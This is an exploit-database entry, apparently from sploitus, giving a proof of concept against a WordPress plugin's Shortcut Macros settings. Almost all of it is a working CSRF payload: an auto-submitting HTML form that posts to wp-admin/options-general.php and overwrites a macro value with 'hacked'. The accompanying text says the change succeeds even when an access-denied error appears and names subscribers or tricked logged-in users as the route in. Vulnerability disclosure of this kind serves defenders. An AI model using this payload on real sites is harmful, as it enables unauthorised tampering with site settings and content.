## https://sploitus.com/exploit?id=WPEX-ID:EF6D0393-0CE3-465C-84C8-53BF8C58958A
Open the following HTML code while being logged in as a subscriber, or make any logged in user open it (via a CSRF attack)
<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
<input type="text" name="ak_action" value="update_aksm_settings">
<input type="text" name="aksm_k_1" value="aaa">
<input type="text" name="aksm_v_1" value="hacked">
<input type="text" name="submit_button" value="Update Shortcut Macros">
</form>
<script>
document.getElementById("test").submit();
</script>
Note: Even though an error can occur, ie "Sorry, you are not allowed to access this page.", settings will be changed